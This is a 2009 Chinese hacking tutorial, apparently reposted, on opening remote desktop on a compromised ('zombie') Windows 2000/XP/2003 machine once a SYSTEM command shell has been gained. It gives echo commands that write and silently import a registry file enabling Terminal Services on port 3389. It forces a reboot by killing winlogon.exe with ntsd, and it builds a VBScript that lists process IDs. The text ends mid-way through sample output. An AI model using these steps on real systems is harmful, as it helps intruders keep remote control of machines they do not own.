当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客必学—开启肉鸡终端全攻略

安全基础
Windows2000/XP禁止Ping命令
原理到应用谈解决ARP攻击的方法
局域网维护及优化的经验和技巧
U盘病毒的另类清除办法
诺顿杀毒软件杀毒功能提升的5个小技巧
网游账号被盗的几个途径 游戏玩家注意
Google产品大全,进来看看你知道吗?
无线网络“正在连接”故障排除
netsh.exe命令能做什么呢?
免费赠送6位数QQ号是陷阱
防止网游盗号通用6种方案
如何在WLAN环境下进行合理的BT下载设置
跨站攻击实例及避免方法
彻底分析ADSL频繁掉线的原因
网络安全提示:奥运期间网上欣赏赛事
Wi-Fi无线连接失败原因及解决方法
预防MP3播放器被病毒感染
无权限的共享文件夹看不到?
6781网址导航站病毒入侵特征介绍
ekrn.exe占用CPU100%该怎么办?

安全基础 中的 黑客必学—开启肉鸡终端全攻略


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 52 ::
收藏到网摘: n/a

 

  今天介绍的这种开终端的方法,绿色,环保,无污染~~

  不须上传任何文件开启终端的方法适合win2k,xp,2003.

  本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~

  在无须传任何文件的情况下开启终端服务。

  一、win 2k下终端开启终端

  首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:

  echo Windows Registry Editor Version 5.00 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg

  echo "Enabled"="0" >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg

  echo "ShutdownWithoutLogon"="0" >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg

  echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg

  echo "TSEnabled"=dword:00000001 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg

  echo "Start"=dword:00000002 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg

  echo "Start"=dword:00000002 >>3389.reg

  echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg

  echo "Hotkey"="1" >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg

  echo "PortNumber"=dword:00000D3D >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg

  echo "PortNumber"=dword:00000D3D >>3389.reg

  把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。

  (如果要改变终端端口只须把上面的两个D3D都改一下就可以了)

  因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。

  一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!

  比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)

  winlogon.exe被关闭后机器立刻强制重启了

  命令执行格式为ntsd -c q -p PID

  那如何知道winlogon.exe的PID进程号呢~

  以下这个脚本可以列举当前所有进程的PID:

  wscript.echo "PID  ProcessName"

  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_

  wscript.echo ps.handle&vbtab&ps.name

  next

  在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe:

  echo wscript.echo "PID  ProcessName">>1.vbe

  echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe

  echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe

  echo next>>1.vbe

  生成1.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。

  运行1.vbe得到如下运行结果:

  C:\WINNT\system32>cscript 1.vbe

  cscript 1.vbe

  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

  PID  ProcessName

  0   System Idle Process

  8   System

  152  smss.exe

  180  csrss.exe

  200  winlogon.exe

  228  services.exe

  240  lsass.exe

  424  svchost.exe

  472  spoolsv.exe

  512  msdtc.exe
  616  svchost.exe

  628  KAVSvc.EXE

  660  llssrv.exe

  692  nvsvc32.exe

  728  regsvc.exe

  748  MSTask.exe

  776  alter.exe

  900  svchost.exe

  916  WinMgmt.exe

  1088  Dfssvc.exe

  484  Explorer.EXE

  1444  mdm.exe

  1340  Server.exe

  1